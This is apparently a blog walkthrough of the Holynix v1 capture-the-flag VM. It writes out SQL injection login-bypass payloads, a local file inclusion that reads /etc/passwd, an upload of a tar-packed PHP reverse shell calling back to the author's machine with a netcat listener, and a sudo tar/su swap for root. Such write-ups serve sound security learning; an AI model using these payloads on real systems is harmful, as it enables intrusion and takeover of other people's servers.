• VM: Holynix: v1
  • Goal: acquire root access
  • Approach: solve without automated exploitation tools

Network IP address fix

When I start the Holynix virtual machine using VMware Workstation 15 Player, the VM does not obtain an IP address automatically. I did the following to fix this issue:

  • Reset the root password
  • login to Holynix as root
  • run command: rm /etc/udev/rules.d/70-persistent-net.rules
  • reboot Holynix: shutdown -r 0

After doing this, the VM should obtain an IP address correctly. Note: if you like to maintain the original root password, record the root entry in /etc/shadow file right before changing the root password and then place it back after the procedue is completed.

Target Discovery

First step is to locate the IP address of my target:

nmap -n -sn 192.168.172.200-254
target discovery
found target at 192.168.172.213

Port scanning

nmap -p- -A 192.168.172.213

Only port 80 is open.

Enumeration

Let’s check out the website. There’s not many pages on the website. Only the home page and the login page.

home page

Then at the login page, I test for SQL injection vulnerability and find that the password field is vulnerability by using a quote (‘) as password:

password SQL injection vulnerable

I then login without password using the following value as password:

' or 1 = 1#
login as alamo

Nice. Now I am logged in as user alamo. There’s a few links. Browse around to find more information. The most eye catching is the Upload link.Seems like I can upload files to the webserver. If I can view the page after upload, it may allow php code execution.

I then write up a simple file test.php to try:

<?php print "Hello" ?>
test upload

But unfortunately, user alamo does not have privilege to upload files.

Looks like I need to login as another user to try again. I then logout and use SQL injection again to login as another user:

‘ or 1 = 1 and username != ‘alamo’#

login again

Good. This time logged in as etenenbaum. I then try uploading the test.php file again and succeeded. Now is to find where the file is. Since it’s called ‘Home Directory Uploader’, I try ~etenenbaum as the path:

test file uploaded.

But unfortunately, received Permission denied error when trying to browse test.php. Not good. Not give up yet. The uploader page has a checkbox ‘Enable the automatic extraction of gzip archives‘. I then make a copy of test.php to test2.php and compress it to test2.php.gz:

gzip test2.php

I then upload a gzip file instead to see what happened. No luck. While it says the file is uploaded successfully. Nothing shows up. It’s getting no where here so I move on to check other stuffs.

Let’s check out the Security link. This page has a drop down select menu to pick a policy type and then display the content. I setup Burp Suite as a proxy to intercept the request. I try to temper with a parameter called text_file_name to see if I can perform LFI (local file inclusion). I test it by changing the value to /etc/passwd.

Local file inclusion

Got it. The password file is shown. It’s vulnerable to LFI. With the ability to display files, I can check to see the code of transfer.php which is responsible to process the upload. So I use this vulnerability to display the content of transfer.php.

transfer.php code

Upon reading the code, There’s couple things I found about uploading gzip archives:

  • The upload content type must be application/gzip. I tested the upload using different browsers. Some browsers will use content type application/x-gzip or application/x-tar instead. If the upload doesn’t work, use Burp to check and ensure the content type is application/gzip
  • sudo tar xzf is used to extract the files and then the upload file is removed. I used gzip to create the gzip file, that’s why it’s not working.

I then go back to use tar to compress the file:

tar czf test2.tar.gz test2.php

And try the upload again. This time the file is uploaded and extracted successfully. Try to browse the file and the page is shown with php code executed. Great news

file executed.

Exploitation

There is a php reverse shell at /usr/share/webshells/php folder. Copy and modify it to using my kali box’s ip address and port 4444. Then proceed to gzip the file:

cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php
tar czf rshell.tar.gz php-reverse-shell.php

The file is then uploaded to the server successfully.

uploaded shell

Now start Netcat listener at the kali box:

nc -lp 4444

Then browse the reverse shell php file.

Awesome. Reverse shell obtained as user www-data.

Privilege Escalation

I noticed the upload php code was using sudo tar & sudo mv. Perform a sudo -l confirms user www-data can do a few sudo commands:

sudo -l

This is enough to obtain root access with the following commands:

sudo mv /bin/tar /bin/tar.org
sudo mv /bin/su /bin/tar
sudo tar

Root access obtained!

Thank you author Holynix for the box Holynix: v1

Leave a Reply

Close Menu